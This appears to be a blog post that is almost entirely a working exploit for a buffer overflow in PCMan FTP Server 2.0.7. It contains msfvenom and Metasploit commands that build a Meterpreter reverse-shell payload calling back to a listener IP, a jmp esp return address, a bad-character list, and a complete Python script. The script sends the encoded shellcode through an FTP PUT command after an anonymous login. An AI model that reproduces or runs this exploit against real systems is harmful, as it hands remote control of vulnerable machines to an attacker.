Sunday, 9 September 2018

PCMan FTP Server Remote Buffer Overflow

Commands:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.85.141 LPORT=31337 -b '\x00\x0a\x0d' -f python
# Payload size: 360 bytes
#
# set payload windows/meterpreter/reverse_tcp
# set lhost <host>
# set lport <port>
# set exitonsession false
# exploit -j -z










eip = "\x65\x82\xA5\x7C" # \x65\x82\xA5\x7C : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll]



Bad Chars:

payload = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")




Buf.py

#!/usr/bin/python
# Exploit: PCMan FTP Server 2.0.7 PUT Buffer Overflow
# Author: @xerubus
# CVE: 2013-4730
import sys, socket

if len(sys.argv) <= 1:
    print "Usage: python exploit.py [host] [port]"
    exit()

host = sys.argv[1]
port = int(sys.argv[2])

rubbish = "\x41" * 2008  # eip offset
eip = "\x65\x82\xA5\x7C" # \x65\x82\xA5\x7C : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll]
nop = "\x90" * 30

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.77.43 LPORT=31337 -b '\x00\x0a\x0d' -f python
# Payload size: 360 bytes
#
# set payload windows/meterpreter/reverse_tcp
# set lhost <host>
# set lport <port>
# set exitonsession false
# exploit -j -z

buf =  ""
buf += "\xdb\xcf\xbb\x55\x2e\x92\x41\xd9\x74\x24\xf4\x5f\x31"
buf += "\xc9\xb1\x54\x31\x5f\x18\x03\x5f\x18\x83\xc7\x51\xcc"
buf += "\x67\xbd\xb1\x92\x88\x3e\x41\xf3\x01\xdb\x70\x33\x75"
buf += "\xaf\x22\x83\xfd\xfd\xce\x68\x53\x16\x45\x1c\x7c\x19"
buf += "\xee\xab\x5a\x14\xef\x80\x9f\x37\x73\xdb\xf3\x97\x4a"
buf += "\x14\x06\xd9\x8b\x49\xeb\x8b\x44\x05\x5e\x3c\xe1\x53"
buf += "\x63\xb7\xb9\x72\xe3\x24\x09\x74\xc2\xfa\x02\x2f\xc4"
buf += "\xfd\xc7\x5b\x4d\xe6\x04\x61\x07\x9d\xfe\x1d\x96\x77"
buf += "\xcf\xde\x35\xb6\xe0\x2c\x47\xfe\xc6\xce\x32\xf6\x35"
buf += "\x72\x45\xcd\x44\xa8\xc0\xd6\xee\x3b\x72\x33\x0f\xef"
buf += "\xe5\xb0\x03\x44\x61\x9e\x07\x5b\xa6\x94\x33\xd0\x49"
buf += "\x7b\xb2\xa2\x6d\x5f\x9f\x71\x0f\xc6\x45\xd7\x30\x18"
buf += "\x26\x88\x94\x52\xca\xdd\xa4\x38\x82\x12\x85\xc2\x52"
buf += "\x3d\x9e\xb1\x60\xe2\x34\x5e\xc8\x6b\x93\x99\x2f\x46"
buf += "\x63\x35\xce\x69\x94\x1f\x14\x3d\xc4\x37\xbd\x3e\x8f"
buf += "\xc7\x42\xeb\x3a\xc2\xd4\xd4\x13\x87\xa9\xbd\x61\x28"
buf += "\xcb\x54\xef\xce\x7b\xf7\xbf\x5e\x3b\xa7\x7f\x0f\xd3"
buf += "\xad\x8f\x70\xc3\xcd\x45\x19\x69\x22\x30\x71\x05\xdb"
buf += "\x19\x09\xb4\x24\xb4\x77\xf6\xaf\x3d\x87\xb8\x47\x37"
buf += "\x9b\xac\x39\xb7\x63\x2c\xd0\xb7\x09\x28\x72\xef\xa5"
buf += "\x32\xa3\xc7\x69\xcd\x86\x5b\x6d\x31\x57\x6a\x05\x07"
buf += "\xcd\xd2\x71\x67\x01\xd3\x81\x31\x4b\xd3\xe9\xe5\x2f"
buf += "\x80\x0c\xea\xe5\xb4\x9c\x7e\x06\xed\x71\x29\x6e\x13"
buf += "\xaf\x1d\x31\xec\x9a\x1e\x36\x12\x58\x02\x9f\x7b\xa2"
buf += "\x02\x1f\x7c\xc8\x82\x4f\x14\x07\xad\x60\xd4\xe8\x64"
buf += "\x29\x7c\x62\xe8\x9b\x1d\x73\x21\x7d\x80\x74\xc5\xa6"
buf += "\xd5\xfa\x2a\x59\xda\xfc\x17\x8f\xe3\x8a\x50\x13\x50"
buf += "\x84\xeb\x36\xf1\x0f\x13\x64\x01\x1a"

evil = rubbish + eip + nop + buf

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)
s.send("PUT " + evil + "\r\n")
s.close()

No comments:

Post a Comment